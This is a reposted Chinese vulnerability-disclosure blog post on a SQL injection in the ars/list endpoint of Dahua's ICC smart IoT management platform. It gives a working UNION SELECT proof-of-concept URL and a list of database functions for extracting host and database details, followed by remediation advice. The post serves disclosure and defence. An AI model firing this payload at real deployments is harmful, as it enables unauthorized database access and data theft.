文章总结： 大华ICC智能物联综合管理平台ars/list接口存在SQL注入漏洞，攻击者可通过构造恶意参数直接操控数据库，获取版本、用户、主机等敏感信息并可能提权控制服务器；作者给出验证POC及截图，并建议升级补丁、采用预编译与参数化查询、严格输入校验、最小权限配置和部署WAF与审计。 综合评分： 82 文章分类： 漏洞分析,WEB安全,漏洞POC,安全建设,解决方案

漏洞验证-大华ICC智能物联综合管理平台 ars/list SQL注入

原创

Domren

网安智界

2026年1月12日 17:20 浙江

一、漏洞描述

大华ICC智能物联综合管理平台大华ICC智能物联综合管理平台 ars/list 接口存在SQL注入漏洞。恶意攻击者通过注入恶意SQL指令，可非法访问、篡改或删除数据库敏感数据，甚至通过数据库提权功能获取服务器最高控制权，导致严重的数据泄露或业务中断。

二、验证POC

https://XXXX/evo-apigw/evo-arsm/1.0.0/ars/list?serviceName=%27+UNION+ALL+SELECT+NULL,NULL,NULL,CONCAT(0x7e,VERSION(),0x7e),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL–+-

其他可用函数：

VERSION() 数据库版本

USER() 当前用户（含主机）

CURRENT_USER() 当前用户

DATABASE() 当前数据库名

@@hostname 服务器主机名

@@version_compile_os 操作系统

@@datadir 数据目录

@@basedir 安装目录

@@version_compile_machine 系统架构

三、验证截图

四、整改建议

1、及时更新系统到厂商最新修复版本以修复漏洞；2、使用预编译语句（PreparedStatement）或参数化查询，强制实现数据与代码分离；3、对所有用户输入进行严格的强类型校验和白名单过滤，清洗潜在恶意字符；4、遵循最小权限原则，严格限制数据库账户的文件读写及执行系统命令权限；5、在网络边界部署Web应用防火墙（WAF）拦截恶意SQL特征，并开启数据库异常操作审计。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：网安智界 Domren《漏洞验证-大华ICC智能物联综合管理平台 ars/list SQL注入》